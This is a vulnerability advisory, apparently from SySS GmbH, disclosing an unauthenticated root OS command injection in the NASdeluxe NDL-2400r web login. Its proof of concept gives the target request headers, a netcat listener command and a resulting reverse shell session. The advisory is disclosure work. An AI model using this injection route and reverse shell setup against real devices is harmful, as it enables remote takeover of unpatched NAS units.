NASdeluxe NDL-2400r 2.01.09 - OS Command Injection

ID 1337DAY-ID-25209
Type zdt
Reporter SySS GmbH
Modified 2016-08-05T00:00:00


Exploit for hardware platform in category web applications

                                            Product: NASdeluxe NDL-2400r
Vendor: Starline Computer GmbH
Affected Version(s): 2.01.10
Tested Version(s): 2.01.09 
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: no fix (product has reached EOL since 3 years)
Vendor Notification: 2016-07-04
Public Disclosure: 2016-08-03
CVE Reference: Not assigned
Author of Advisory: Klaus Eisentraut, SySS GmbH,
The product "NASdeluxe NDL-2400r" [3] is vulnerable to OS Command Injection
as root. No credentials are required to exploit this vulnerability.
Vulnerability Details / Proof-of-Concept:
The language parameter in the web interface login request of the product 
"NASdeluxe NDL-2400r" is vulnerable to an OS Command Injection as root. 
The SySS GmbH sent the following HTTPS request to the webinterface:
POST /usr/usrgetform.html?name=index HTTP/1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
After sending the request, a reverse shell connected back:
# nc -lvvp 443
Listening on any address 443 (https)
Connection from
bash: no job control in this shell
bash-3.00# whoami
bash-3.00# cat /img/version
The tested firmware version was 2.01.09. The most current version is 
2.01.10 according to the web page of the vendor [3]. However there are
no hints of a security update in the release notes [4]. Thus, the SySS 
GmbH assumes that this vulnerability is likely also present in the most 
current firmware version from 2009-10-22.
The product has reached end-of-life (EOL) status since more than three 
years. Thus, no patch will be provided by the vendor.
It is highly recommended to migrate to one of the newer and still 
supported NAS solutions which are (according to Starline Computer GmbH) 
not affected by this vulnerability.
Disclosure Timeline:
2016-06-29: Vulnerability discovered
2016-07-04: asked [email protected] for contact person (no answer)
2016-07-22: sent this advisory to [email protected]
2016-07-22: response from vendor: won't fix (product reached EOL >3 years)
2016-08-03: public disclosure
[1] SySS GmbH, SYSS-2016-065
[2] SySS GmbH, SySS Responsible Disclosure Policy
[3] NASdeluxe Homepage
[4] NDL-2400R Firmware Release Notes
This security vulnerability was found by Klaus Eisentraut of the SySS
E-Mail: [email protected]
Public Key:
Key ID: 0xBAC677AE
Key Fingerprint: F5E8 E8E1 A414 4886 0A8B 0411 DAB0 4DB5 BAC6 77AE

# [2018-03-19]  #